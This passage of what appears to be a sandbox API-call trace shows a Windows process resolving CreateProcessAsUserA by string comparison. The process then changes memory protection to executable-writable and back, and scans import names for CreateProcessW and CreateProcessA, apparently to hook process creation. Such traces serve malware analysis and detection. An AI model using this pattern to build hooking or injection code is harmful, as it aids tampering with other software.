lpString2="CreateProcessAsUserA") returned -1 [0207.987] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="CreateProcessAsUserA") returned -1 [0207.987] lstrcmpA (lpString1="AccessCheck", lpString2="CreateProcessAsUserA") returned -1 [0207.987] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="CreateProcessAsUserA") returned -1 [0207.987] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="CreateProcessAsUserA") returned -1 [0207.987] lstrcmpA (lpString1="AccessCheckByType", lpString2="CreateProcessAsUserA") returned -1 [0207.987] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="CreateProcessAsUserA") returned -1 [0207.987] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="CreateProcessAsUserA") returned -1 [0207.987] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="CreateProcessAsUserA") returned -1 [0207.987] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="CreateProcessAsUserA") returned -1 [0207.987] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="CreateProcessAsUserA") returned -1 [0207.987] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="CreateProcessAsUserA") returned -1 [0207.987] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="CreateProcessAsUserA") returned -1 [0207.987] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="CreateProcessAsUserA") returned -1 [0207.987] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="CreateProcessAsUserA") returned -1 [0207.987] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="CreateProcessAsUserA") returned -1 [0207.987] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="CreateProcessAsUserA") returned -1 [0207.987] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="CreateProcessAsUserA") returned -1 [0207.987] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="CreateProcessAsUserA") returned -1 [0207.988] lstrcmpA (lpString1="AddAce", lpString2="CreateProcessAsUserA") returned -1 [0207.988] lstrcmpA (lpString1="AddAuditAccessAce", lpString2="CreateProcessAsUserA") returned -1 [0207.988] lstrcmpA (lpString1="AddAuditAccessAceEx", lpString2="CreateProcessAsUserA") returned -1 [0207.988] lstrcmpA (lpString1="AddAuditAccessObjectAce", lpString2="CreateProcessAsUserA") returned -1 [0207.988] lstrcmpA (lpString1="AddConditionalAce", lpString2="CreateProcessAsUserA") returned -1 [0207.988] lstrcmpA (lpString1="AddMandatoryAce", lpString2="CreateProcessAsUserA") returned -1 [0207.988] lstrcmpA (lpString1="AddUsersToEncryptedFile", lpString2="CreateProcessAsUserA") returned -1 [0207.988] lstrcmpA (lpString1="AddUsersToEncryptedFileEx", lpString2="CreateProcessAsUserA") returned -1 [0207.988] lstrcmpA (lpString1="AdjustTokenGroups", lpString2="CreateProcessAsUserA") returned -1 [0207.988] lstrcmpA (lpString1="AdjustTokenPrivileges", lpString2="CreateProcessAsUserA") returned -1 [0207.988] lstrcmpA (lpString1="AllocateAndInitializeSid", lpString2="CreateProcessAsUserA") returned -1 [0207.988] lstrcmpA (lpString1="AllocateLocallyUniqueId", lpString2="CreateProcessAsUserA") returned -1 [0207.988] lstrcmpA (lpString1="AreAllAccessesGranted", lpString2="CreateProcessAsUserA") returned -1 [0207.988] lstrcmpA (lpString1="AreAnyAccessesGranted", lpString2="CreateProcessAsUserA") returned -1 [0207.988] lstrcmpA (lpString1="AuditComputeEffectivePolicyBySid", lpString2="CreateProcessAsUserA") returned -1 [0207.988] lstrcmpA (lpString1="AuditComputeEffectivePolicyByToken", lpString2="CreateProcessAsUserA") returned -1 [0207.988] lstrcmpA (lpString1="AuditEnumerateCategories", lpString2="CreateProcessAsUserA") returned -1 [0207.988] lstrcmpA (lpString1="AuditEnumeratePerUserPolicy", lpString2="CreateProcessAsUserA") returned -1 [0207.988] lstrcmpA (lpString1="AuditEnumerateSubCategories", lpString2="CreateProcessAsUserA") returned -1 [0207.988] lstrcmpA (lpString1="AuditFree", lpString2="CreateProcessAsUserA") returned -1 [0207.988] lstrcmpA (lpString1="AuditLookupCategoryGuidFromCategoryId", lpString2="CreateProcessAsUserA") returned -1 [0207.988] lstrcmpA (lpString1="AuditLookupCategoryIdFromCategoryGuid", lpString2="CreateProcessAsUserA") returned -1 [0207.988] lstrcmpA (lpString1="AuditLookupCategoryNameA", lpString2="CreateProcessAsUserA") returned -1 [0207.988] lstrcmpA (lpString1="AuditLookupCategoryNameW", lpString2="CreateProcessAsUserA") returned -1 [0207.988] lstrcmpA (lpString1="AuditLookupSubCategoryNameA", lpString2="CreateProcessAsUserA") returned -1 [0207.988] lstrcmpA (lpString1="AuditLookupSubCategoryNameW", lpString2="CreateProcessAsUserA") returned -1 [0207.988] lstrcmpA (lpString1="AuditQueryGlobalSaclA", lpString2="CreateProcessAsUserA") returned -1 [0207.988] lstrcmpA (lpString1="AuditQueryGlobalSaclW", lpString2="CreateProcessAsUserA") returned -1 [0207.988] lstrcmpA (lpString1="AuditQueryPerUserPolicy", lpString2="CreateProcessAsUserA") returned -1 [0207.988] lstrcmpA (lpString1="AuditQuerySecurity", lpString2="CreateProcessAsUserA") returned -1 [0207.988] lstrcmpA (lpString1="AuditQuerySystemPolicy", lpString2="CreateProcessAsUserA") returned -1 [0207.988] lstrcmpA (lpString1="AuditSetGlobalSaclA", lpString2="CreateProcessAsUserA") returned -1 [0207.988] lstrcmpA (lpString1="AuditSetGlobalSaclW", lpString2="CreateProcessAsUserA") returned -1 [0207.988] lstrcmpA (lpString1="AuditSetPerUserPolicy", lpString2="CreateProcessAsUserA") returned -1 [0207.988] lstrcmpA (lpString1="AuditSetSecurity", lpString2="CreateProcessAsUserA") returned -1 [0207.988] lstrcmpA (lpString1="AuditSetSystemPolicy", lpString2="CreateProcessAsUserA") returned -1 [0207.988] lstrcmpA (lpString1="BackupEventLogA", lpString2="CreateProcessAsUserA") returned -1 [0207.988] lstrcmpA (lpString1="BackupEventLogW", lpString2="CreateProcessAsUserA") returned -1 [0207.988] lstrcmpA (lpString1="BaseRegCloseKey", lpString2="CreateProcessAsUserA") returned -1 [0207.988] lstrcmpA (lpString1="BaseRegCreateKey", lpString2="CreateProcessAsUserA") returned -1 [0207.988] lstrcmpA (lpString1="BaseRegDeleteKeyEx", lpString2="CreateProcessAsUserA") returned -1 [0207.988] lstrcmpA (lpString1="BaseRegDeleteValue", lpString2="CreateProcessAsUserA") returned -1 [0207.988] lstrcmpA (lpString1="BaseRegFlushKey", lpString2="CreateProcessAsUserA") returned -1 [0207.988] lstrcmpA (lpString1="BaseRegGetVersion", lpString2="CreateProcessAsUserA") returned -1 [0207.989] lstrcmpA (lpString1="BaseRegLoadKey", lpString2="CreateProcessAsUserA") returned -1 [0207.989] lstrcmpA (lpString1="BaseRegOpenKey", lpString2="CreateProcessAsUserA") returned -1 [0207.989] lstrcmpA (lpString1="BaseRegRestoreKey", lpString2="CreateProcessAsUserA") returned -1 [0207.989] lstrcmpA (lpString1="BaseRegSaveKeyEx", lpString2="CreateProcessAsUserA") returned -1 [0207.989] lstrcmpA (lpString1="BaseRegSetKeySecurity", lpString2="CreateProcessAsUserA") returned -1 [0207.989] lstrcmpA (lpString1="BaseRegSetValue", lpString2="CreateProcessAsUserA") returned -1 [0207.989] lstrcmpA (lpString1="BaseRegUnLoadKey", lpString2="CreateProcessAsUserA") returned -1 [0207.989] lstrcmpA (lpString1="BuildExplicitAccessWithNameA", lpString2="CreateProcessAsUserA") returned -1 [0207.989] lstrcmpA (lpString1="BuildExplicitAccessWithNameW", lpString2="CreateProcessAsUserA") returned -1 [0207.989] lstrcmpA (lpString1="BuildImpersonateExplicitAccessWithNameA", lpString2="CreateProcessAsUserA") returned -1 [0207.989] lstrcmpA (lpString1="BuildImpersonateExplicitAccessWithNameW", lpString2="CreateProcessAsUserA") returned -1 [0207.989] lstrcmpA (lpString1="BuildImpersonateTrusteeA", lpString2="CreateProcessAsUserA") returned -1 [0207.989] lstrcmpA (lpString1="BuildImpersonateTrusteeW", lpString2="CreateProcessAsUserA") returned -1 [0207.989] lstrcmpA (lpString1="BuildSecurityDescriptorA", lpString2="CreateProcessAsUserA") returned -1 [0207.989] lstrcmpA (lpString1="BuildSecurityDescriptorW", lpString2="CreateProcessAsUserA") returned -1 [0207.989] lstrcmpA (lpString1="BuildTrusteeWithNameA", lpString2="CreateProcessAsUserA") returned -1 [0207.989] lstrcmpA (lpString1="BuildTrusteeWithNameW", lpString2="CreateProcessAsUserA") returned -1 [0207.989] lstrcmpA (lpString1="BuildTrusteeWithObjectsAndNameA", lpString2="CreateProcessAsUserA") returned -1 [0207.989] lstrcmpA (lpString1="BuildTrusteeWithObjectsAndNameW", lpString2="CreateProcessAsUserA") returned -1 [0207.989] lstrcmpA (lpString1="BuildTrusteeWithObjectsAndSidA", lpString2="CreateProcessAsUserA") returned -1 [0207.989] lstrcmpA (lpString1="BuildTrusteeWithObjectsAndSidW", lpString2="CreateProcessAsUserA") returned -1 [0207.989] lstrcmpA (lpString1="BuildTrusteeWithSidA", lpString2="CreateProcessAsUserA") returned -1 [0207.989] lstrcmpA (lpString1="BuildTrusteeWithSidW", lpString2="CreateProcessAsUserA") returned -1 [0207.989] lstrcmpA (lpString1="CancelOverlappedAccess", lpString2="CreateProcessAsUserA") returned -1 [0207.989] lstrcmpA (lpString1="ChangeServiceConfig2A", lpString2="CreateProcessAsUserA") returned -1 [0207.989] lstrcmpA (lpString1="ChangeServiceConfig2W", lpString2="CreateProcessAsUserA") returned -1 [0207.989] lstrcmpA (lpString1="ChangeServiceConfigA", lpString2="CreateProcessAsUserA") returned -1 [0207.989] lstrcmpA (lpString1="ChangeServiceConfigW", lpString2="CreateProcessAsUserA") returned -1 [0207.989] lstrcmpA (lpString1="CheckForHiberboot", lpString2="CreateProcessAsUserA") returned -1 [0207.989] lstrcmpA (lpString1="CheckTokenMembership", lpString2="CreateProcessAsUserA") returned -1 [0207.989] lstrcmpA (lpString1="ClearEventLogA", lpString2="CreateProcessAsUserA") returned -1 [0207.989] lstrcmpA (lpString1="ClearEventLogW", lpString2="CreateProcessAsUserA") returned -1 [0207.989] lstrcmpA (lpString1="CloseCodeAuthzLevel", lpString2="CreateProcessAsUserA") returned -1 [0207.989] lstrcmpA (lpString1="CloseEncryptedFileRaw", lpString2="CreateProcessAsUserA") returned -1 [0207.989] lstrcmpA (lpString1="CloseEventLog", lpString2="CreateProcessAsUserA") returned -1 [0207.989] lstrcmpA (lpString1="CloseServiceHandle", lpString2="CreateProcessAsUserA") returned -1 [0207.989] lstrcmpA (lpString1="CloseThreadWaitChainSession", lpString2="CreateProcessAsUserA") returned -1 [0207.989] lstrcmpA (lpString1="CloseTrace", lpString2="CreateProcessAsUserA") returned -1 [0207.989] lstrcmpA (lpString1="CommandLineFromMsiDescriptor", lpString2="CreateProcessAsUserA") returned -1 [0207.989] lstrcmpA (lpString1="ComputeAccessTokenFromCodeAuthzLevel", lpString2="CreateProcessAsUserA") returned -1 [0207.989] lstrcmpA (lpString1="ControlService", lpString2="CreateProcessAsUserA") returned -1 [0207.989] lstrcmpA (lpString1="ControlServiceExA", lpString2="CreateProcessAsUserA") returned -1 [0207.989] lstrcmpA (lpString1="ControlServiceExW", lpString2="CreateProcessAsUserA") returned -1 [0207.989] lstrcmpA (lpString1="ControlTraceA", lpString2="CreateProcessAsUserA") returned -1 [0207.989] lstrcmpA (lpString1="ControlTraceW", lpString2="CreateProcessAsUserA") returned -1 [0207.989] lstrcmpA (lpString1="ConvertAccessToSecurityDescriptorA", lpString2="CreateProcessAsUserA") returned -1 [0207.990] lstrcmpA (lpString1="ConvertAccessToSecurityDescriptorW", lpString2="CreateProcessAsUserA") returned -1 [0207.990] lstrcmpA (lpString1="ConvertSDToStringSDDomainW", lpString2="CreateProcessAsUserA") returned -1 [0207.990] lstrcmpA (lpString1="ConvertSDToStringSDRootDomainA", lpString2="CreateProcessAsUserA") returned -1 [0207.990] lstrcmpA (lpString1="ConvertSDToStringSDRootDomainW", lpString2="CreateProcessAsUserA") returned -1 [0207.990] lstrcmpA (lpString1="ConvertSecurityDescriptorToAccessA", lpString2="CreateProcessAsUserA") returned -1 [0207.990] lstrcmpA (lpString1="ConvertSecurityDescriptorToAccessNamedA", lpString2="CreateProcessAsUserA") returned -1 [0207.990] lstrcmpA (lpString1="ConvertSecurityDescriptorToAccessNamedW", lpString2="CreateProcessAsUserA") returned -1 [0207.990] lstrcmpA (lpString1="ConvertSecurityDescriptorToAccessW", lpString2="CreateProcessAsUserA") returned -1 [0207.990] lstrcmpA (lpString1="ConvertSecurityDescriptorToStringSecurityDescriptorA", lpString2="CreateProcessAsUserA") returned -1 [0207.990] lstrcmpA (lpString1="ConvertSecurityDescriptorToStringSecurityDescriptorW", lpString2="CreateProcessAsUserA") returned -1 [0207.990] lstrcmpA (lpString1="ConvertSidToStringSidA", lpString2="CreateProcessAsUserA") returned -1 [0207.990] lstrcmpA (lpString1="ConvertSidToStringSidW", lpString2="CreateProcessAsUserA") returned -1 [0207.990] lstrcmpA (lpString1="ConvertStringSDToSDDomainA", lpString2="CreateProcessAsUserA") returned -1 [0207.990] lstrcmpA (lpString1="ConvertStringSDToSDDomainW", lpString2="CreateProcessAsUserA") returned -1 [0207.990] lstrcmpA (lpString1="ConvertStringSDToSDRootDomainA", lpString2="CreateProcessAsUserA") returned -1 [0207.990] lstrcmpA (lpString1="ConvertStringSDToSDRootDomainW", lpString2="CreateProcessAsUserA") returned -1 [0207.990] lstrcmpA (lpString1="ConvertStringSecurityDescriptorToSecurityDescriptorA", lpString2="CreateProcessAsUserA") returned -1 [0207.990] lstrcmpA (lpString1="ConvertStringSecurityDescriptorToSecurityDescriptorW", lpString2="CreateProcessAsUserA") returned -1 [0207.990] lstrcmpA (lpString1="ConvertStringSidToSidA", lpString2="CreateProcessAsUserA") returned -1 [0207.990] lstrcmpA (lpString1="ConvertStringSidToSidW", lpString2="CreateProcessAsUserA") returned -1 [0207.990] lstrcmpA (lpString1="ConvertToAutoInheritPrivateObjectSecurity", lpString2="CreateProcessAsUserA") returned -1 [0207.990] lstrcmpA (lpString1="CopySid", lpString2="CreateProcessAsUserA") returned -1 [0207.990] lstrcmpA (lpString1="CreateCodeAuthzLevel", lpString2="CreateProcessAsUserA") returned -1 [0207.990] lstrcmpA (lpString1="CreatePrivateObjectSecurity", lpString2="CreateProcessAsUserA") returned -1 [0207.990] lstrcmpA (lpString1="CreatePrivateObjectSecurityEx", lpString2="CreateProcessAsUserA") returned -1 [0207.990] lstrcmpA (lpString1="CreatePrivateObjectSecurityWithMultipleInheritance", lpString2="CreateProcessAsUserA") returned -1 [0207.990] lstrcmpA (lpString1="CreateProcessAsUserA", lpString2="CreateProcessAsUserA") returned 0 [0207.990] VirtualProtect (in: lpAddress=0x7ff97700ba88, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0xb0938cf8c8 | out: lpflOldProtect=0xb0938cf8c8*=0x2) returned 1 [0207.990] VirtualProtect (in: lpAddress=0x7ff976fe3800, dwSize=0xe, flNewProtect=0x40, lpflOldProtect=0xb0938cf8c0 | out: lpflOldProtect=0xb0938cf8c0*=0x20) returned 1 [0207.991] VirtualProtect (in: lpAddress=0x7ff976fe3800, dwSize=0xe, flNewProtect=0x20, lpflOldProtect=0xb0938cf8c0 | out: lpflOldProtect=0xb0938cf8c0*=0x40) returned 1 [0207.991] VirtualProtect (in: lpAddress=0x7ff97700ba88, dwSize=0x4, flNewProtect=0x2, lpflOldProtect=0xb0938cf8c8 | out: lpflOldProtect=0xb0938cf8c8*=0x40) returned 1 [0207.991] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0xb0938cf860, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xb0938cf860, ReturnLength=0x0) returned 0x0 [0207.991] LoadLibraryA (lpLibFileName="PSAPI.DLL") returned 0x7ff977820000 [0208.034] GetProcAddress (hModule=0x7ff977820000, lpProcName="EnumProcessModules") returned 0x7ff977821040 [0208.034] EnumProcessModules (in: hProcess=0xffffffffffffffff, lphModule=0xb095a03d20, cb=0x1000, lpcbNeeded=0xb0938cf968 | out: lphModule=0xb095a03d20, lpcbNeeded=0xb0938cf968) returned 1 [0208.035] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff7ce3a0000, lpBuffer=0xb0938cf970, dwLength=0x30 | out: lpBuffer=0xb0938cf970*(BaseAddress=0x7ff7ce3a0000, AllocationBase=0x7ff7ce3a0000, AllocationProtect=0x80, __alignment1=0xffffe000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xb0)) returned 0x30 [0208.035] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0xb0938cf8b0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xb0938cf8b0, ReturnLength=0x0) returned 0x0 [0208.035] lstrcmpiA (lpString1="_initterm", lpString2="CreateProcessW") returned -1 [0208.035] lstrcmpiA (lpString1="exit", lpString2="CreateProcessW") returned 1 [0208.035] lstrcmpiA (lpString1="_initterm_e", lpString2="CreateProcessW") returned -1 [0208.035] lstrcmpiA (lpString1="__wgetmainargs", lpString2="CreateProcessW") returned -1 [0208.035] lstrcmpiA (lpString1="QueryPerformanceCounter", lpString2="CreateProcessW") returned 1 [0208.035] lstrcmpiA (lpString1="ExitProcess", lpString2="CreateProcessW") returned 1 [0208.035] lstrcmpiA (lpString1="GetCurrentProcess", lpString2="CreateProcessW") returned 1 [0208.035] lstrcmpiA (lpString1="GetCurrentProcessId", lpString2="CreateProcessW") returned 1 [0208.035] lstrcmpiA (lpString1="TerminateProcess", lpString2="CreateProcessW") returned 1 [0208.035] lstrcmpiA (lpString1="GetCurrentThreadId", lpString2="CreateProcessW") returned 1 [0208.035] lstrcmpiA (lpString1="SetProcessAffinityUpdateMode", lpString2="CreateProcessW") returned 1 [0208.035] lstrcmpiA (lpString1="OpenProcessToken", lpString2="CreateProcessW") returned 1 [0208.035] lstrcmpiA (lpString1="GetSystemTimeAsFileTime", lpString2="CreateProcessW") returned 1 [0208.035] lstrcmpiA (lpString1="GetTickCount", lpString2="CreateProcessW") returned 1 [0208.035] lstrcmpiA (lpString1="RtlVirtualUnwind", lpString2="CreateProcessW") returned 1 [0208.035] lstrcmpiA (lpString1="RtlLookupFunctionEntry", lpString2="CreateProcessW") returned 1 [0208.035] lstrcmpiA (lpString1="RtlCaptureContext", lpString2="CreateProcessW") returned 1 [0208.035] lstrcmpiA (lpString1="SetUnhandledExceptionFilter", lpString2="CreateProcessW") returned 1 [0208.035] lstrcmpiA (lpString1="GetLastError", lpString2="CreateProcessW") returned 1 [0208.035] lstrcmpiA (lpString1="SetErrorMode", lpString2="CreateProcessW") returned 1 [0208.035] lstrcmpiA (lpString1="UnhandledExceptionFilter", lpString2="CreateProcessW") returned 1 [0208.035] lstrcmpiA (lpString1="RegisterServiceCtrlHandlerW", lpString2="CreateProcessW") returned 1 [0208.035] lstrcmpiA (lpString1="StartServiceCtrlDispatcherW", lpString2="CreateProcessW") returned 1 [0208.036] lstrcmpiA (lpString1="SetServiceStatus", lpString2="CreateProcessW") returned 1 [0208.036] lstrcmpiA (lpString1="LoadLibraryExW", lpString2="CreateProcessW") returned 1 [0208.036] lstrcmpiA (lpString1="GetProcAddress", lpString2="CreateProcessW") returned 1 [0208.036] lstrcmpiA (lpString1="FreeLibrary", lpString2="CreateProcessW") returned 1 [0208.036] lstrcmpiA (lpString1="AcquireSRWLockShared", lpString2="CreateProcessW") returned -1 [0208.036] lstrcmpiA (lpString1="ReleaseSRWLockExclusive", lpString2="CreateProcessW") returned 1 [0208.036] lstrcmpiA (lpString1="LeaveCriticalSection", lpString2="CreateProcessW") returned 1 [0208.036] lstrcmpiA (lpString1="EnterCriticalSection", lpString2="CreateProcessW") returned 1 [0208.036] lstrcmpiA (lpString1="AcquireSRWLockExclusive", lpString2="CreateProcessW") returned -1 [0208.036] lstrcmpiA (lpString1="InitializeSRWLock", lpString2="CreateProcessW") returned 1 [0208.036] lstrcmpiA (lpString1="ReleaseSRWLockShared", lpString2="CreateProcessW") returned 1 [0208.036] lstrcmpiA (lpString1="RegCloseKey", lpString2="CreateProcessW") returned 1 [0208.036] lstrcmpiA (lpString1="RegDisablePredefinedCacheEx", lpString2="CreateProcessW") returned 1 [0208.036] lstrcmpiA (lpString1="RegQueryValueExW", lpString2="CreateProcessW") returned 1 [0208.036] lstrcmpiA (lpString1="RegOpenKeyExW", lpString2="CreateProcessW") returned 1 [0208.036] lstrcmpiA (lpString1="RegGetValueW", lpString2="CreateProcessW") returned 1 [0208.036] lstrcmpiA (lpString1="RegEnumKeyExW", lpString2="CreateProcessW") returned 1 [0208.036] lstrcmpiA (lpString1="ExpandEnvironmentStringsW", lpString2="CreateProcessW") returned 1 [0208.036] lstrcmpiA (lpString1="GetCommandLineW", lpString2="CreateProcessW") returned 1 [0208.036] lstrcmpiA (lpString1="CompareStringOrdinal", lpString2="CreateProcessW") returned -1 [0208.036] lstrcmpiA (lpString1="WideCharToMultiByte", lpString2="CreateProcessW") returned 1 [0208.036] lstrcmpiA (lpString1="RpcMgmtStopServerListening", lpString2="CreateProcessW") returned 1 [0208.036] lstrcmpiA (lpString1="I_RpcServerDisableExceptionFilter", lpString2="CreateProcessW") returned 1 [0208.036] lstrcmpiA (lpString1="RpcServerRegisterIf", lpString2="CreateProcessW") returned 1 [0208.036] lstrcmpiA (lpString1="RpcServerUnregisterIfEx", lpString2="CreateProcessW") returned 1 [0208.036] lstrcmpiA (lpString1="RpcServerListen", lpString2="CreateProcessW") returned 1 [0208.036] lstrcmpiA (lpString1="I_RpcMapWin32Status", lpString2="CreateProcessW") returned 1 [0208.036] lstrcmpiA (lpString1="RpcServerUseProtseqEpW", lpString2="CreateProcessW") returned 1 [0208.036] lstrcmpiA (lpString1="RpcServerUnregisterIf", lpString2="CreateProcessW") returned 1 [0208.036] lstrcmpiA (lpString1="RpcMgmtSetServerStackSize", lpString2="CreateProcessW") returned 1 [0208.036] lstrcmpiA (lpString1="RpcMgmtWaitServerListen", lpString2="CreateProcessW") returned 1 [0208.036] lstrcmpiA (lpString1="HeapAlloc", lpString2="CreateProcessW") returned 1 [0208.036] lstrcmpiA (lpString1="HeapFree", lpString2="CreateProcessW") returned 1 [0208.036] lstrcmpiA (lpString1="GetProcessHeap", lpString2="CreateProcessW") returned 1 [0208.036] lstrcmpiA (lpString1="HeapSetInformation", lpString2="CreateProcessW") returned 1 [0208.036] lstrcmpiA (lpString1="LCMapStringW", lpString2="CreateProcessW") returned 1 [0208.036] lstrcmpiA (lpString1="GetTokenInformation", lpString2="CreateProcessW") returned 1 [0208.036] lstrcmpiA (lpString1="SetSecurityDescriptorGroup", lpString2="CreateProcessW") returned 1 [0208.036] lstrcmpiA (lpString1="GetLengthSid", lpString2="CreateProcessW") returned 1 [0208.036] lstrcmpiA (lpString1="AddAccessAllowedAce", lpString2="CreateProcessW") returned -1 [0208.036] lstrcmpiA (lpString1="InitializeSecurityDescriptor", lpString2="CreateProcessW") returned 1 [0208.036] lstrcmpiA (lpString1="SetSecurityDescriptorOwner", lpString2="CreateProcessW") returned 1 [0208.036] lstrcmpiA (lpString1="InitializeAcl", lpString2="CreateProcessW") returned 1 [0208.036] lstrcmpiA (lpString1="SetSecurityDescriptorDacl", lpString2="CreateProcessW") returned 1 [0208.036] lstrcmpiA (lpString1="LocalAlloc", lpString2="CreateProcessW") returned 1 [0208.037] lstrcmpiA (lpString1="LocalFree", lpString2="CreateProcessW") returned 1 [0208.037] lstrcmpiA (lpString1="CloseHandle", lpString2="CreateProcessW") returned -1 [0208.037] lstrcmpiA (lpString1="CreateActCtxW", lpString2="CreateProcessW") returned -1 [0208.037] lstrcmpiA (lpString1="ActivateActCtx", lpString2="CreateProcessW") returned -1 [0208.037] lstrcmpiA (lpString1="DeactivateActCtx", lpString2="CreateProcessW") returned 1 [0208.037] lstrcmpiA (lpString1="ReleaseActCtx", lpString2="CreateProcessW") returned 1 [0208.037] lstrcmpiA (lpString1="RegisterWaitForSingleObjectEx", lpString2="CreateProcessW") returned 1 [0208.037] lstrcmpiA (lpString1="EtwEventWrite", lpString2="CreateProcessW") returned 1 [0208.037] lstrcmpiA (lpString1="EtwEventEnabled", lpString2="CreateProcessW") returned 1 [0208.037] lstrcmpiA (lpString1="EtwEventRegister", lpString2="CreateProcessW") returned 1 [0208.037] lstrcmpiA (lpString1="RtlUnhandledExceptionFilter", lpString2="CreateProcessW") returned 1 [0208.037] lstrcmpiA (lpString1="NtSetInformationProcess", lpString2="CreateProcessW") returned 1 [0208.037] lstrcmpiA (lpString1="RtlSetProcessIsCritical", lpString2="CreateProcessW") returned 1 [0208.037] lstrcmpiA (lpString1="RtlInitializeCriticalSection", lpString2="CreateProcessW") returned 1 [0208.037] lstrcmpiA (lpString1="RtlSubAuthoritySid", lpString2="CreateProcessW") returned 1 [0208.037] lstrcmpiA (lpString1="RtlLengthRequiredSid", lpString2="CreateProcessW") returned 1 [0208.037] lstrcmpiA (lpString1="RtlFreeHeap", lpString2="CreateProcessW") returned 1 [0208.037] lstrcmpiA (lpString1="RtlCopySid", lpString2="CreateProcessW") returned 1 [0208.037] lstrcmpiA (lpString1="RtlAllocateHeap", lpString2="CreateProcessW") returned 1 [0208.037] lstrcmpiA (lpString1="RtlInitializeSid", lpString2="CreateProcessW") returned 1 [0208.037] lstrcmpiA (lpString1="RtlSubAuthorityCountSid", lpString2="CreateProcessW") returned 1 [0208.037] lstrcmpiA (lpString1="RtlImageNtHeader", lpString2="CreateProcessW") returned 1 [0208.037] lstrcmpiA (lpString1="DelayLoadFailureHook", lpString2="CreateProcessW") returned 1 [0208.037] lstrcmpiA (lpString1="ResolveDelayLoadedAPI", lpString2="CreateProcessW") returned 1 [0208.037] lstrcmpiA (lpString1="memcpy", lpString2="CreateProcessW") returned 1 [0208.037] lstrcmpiA (lpString1="CoCreateInstance", lpString2="CreateProcessW") returned -1 [0208.037] lstrcmpiA (lpString1="CoInitializeSecurity", lpString2="CreateProcessW") returned -1 [0208.037] lstrcmpiA (lpString1="CoInitializeEx", lpString2="CreateProcessW") returned -1 [0208.037] lstrcmpiA (lpString1="CLSIDFromString", lpString2="CreateProcessW") returned -1 [0208.037] lstrcmpiA (lpString1="_initterm", lpString2="CreateProcessA") returned -1 [0208.037] lstrcmpiA (lpString1="exit", lpString2="CreateProcessA") returned 1 [0208.037] lstrcmpiA (lpString1="_initterm_e", lpString2="CreateProcessA") returned -1 [0208.037] lstrcmpiA (lpString1="__wgetmainargs", lpString2="CreateProcessA") returned -1 [0208.037] lstrcmpiA (lpString1="QueryPerformanceCounter", lpString2="CreateProcessA") returned 1 [0208.037] lstrcmpiA (lpString1="ExitProcess", lpString2="CreateProcessA") returned 1 [0208.037] lstrcmpiA (lpString1="GetCurrentProcess", lpString2="CreateProcessA") returned 1 [0208.037] lstrcmpiA (lpString1="GetCurrentProcessId", lpString2="CreateProcessA") returned 1 [0208.037] lstrcmpiA (lpString1="TerminateProcess", lpString2="CreateProcessA") returned 1 [0208.037] lstrcmpiA (lpString1="GetCurrentThreadId", lpString2="CreateProcessA") returned 1 [0208.037] lstrcmpiA (lpString1="SetProcessAffinityUpdateMode", lpString2="CreateProcessA") returned 1 [0208.037] lstrcmpiA (lpString1="OpenProcessToken", lpString2="CreateProcessA") returned 1 [0208.038] lstrcmpiA (lpString1="GetSystemTimeAsFileTime", lpString2="CreateProcessA") returned 1 [0208.038] lstrcmpiA (lpString1="GetTickCount", lpString2="CreateProcessA") returned 1 [0208.038] lstrcmpiA (lpString1="RtlVirtualUnwind", lpString2="CreateProcessA") returned 1 [0208.038] lstrcmpiA (lpString1="RtlLookupFunctionEntry", lpString2="CreateProcessA") returned 1 [0208.038] lstrcmpiA (lpString1="RtlCaptureContext", lpString2="CreateProcessA") returned 1 [0208.038] lstrcmpiA (lpString1="SetUnhandledExceptionFilter", lpString2="CreateProcessA") returned 1 [0208.038] lstrcmpiA (lpString1="GetLastError", lpString2="CreateProcessA") returned 1 [0208.038] lstrcmpiA (lpString1="SetErrorMode", lpString2="CreateProcessA") returned 1 [0208.038] lstrcmpiA (lpString1="UnhandledExceptionFilter", lpString2="CreateProcessA") returned 1 [0208.038] lstrcmpiA (lpString1="RegisterServiceCtrlHandlerW", lpString2="CreateProcessA") returned 1 [0208.038] lstrcmpiA (lpString1="StartServiceCtrlDispatcherW", lpString2="CreateProcessA") returned 1 [0208.038] lstrcmpiA (lpString1="SetServiceStatus", lpString2="CreateProcessA") returned 1 [0208.038] lstrcmpiA (lpString1="LoadLibraryExW", lpString2="CreateProcessA") returned 1 [0208.038] lstrcmpiA (lpString1="GetProcAddress", lpString2="CreateProcessA") returned 1 [0208.038] lstrcmpiA (lpString1="FreeLibrary", lpString2="CreateProcessA") returned 1 [0208.038] lstrcmpiA (lpString1="AcquireSRWLockShared", lpString2="CreateProcessA") returned -1 [0208.038] lstrcmpiA (lpString1="ReleaseSRWLockExclusive", lpString2="CreateProcessA") returned 1 [0208.038] lstrcmpiA (lpString1="LeaveCriticalSection", lpString2="CreateProcessA") returned 1 [0208.038] lstrcmpiA (lpString1="EnterCriticalSection", lpString2="CreateProcessA") returned 1 [0208.038] lstrcmpiA (lpString1="AcquireSRWLockExclusive", lpString2="CreateProcessA") returned -1 [0208.038] lstrcmpiA 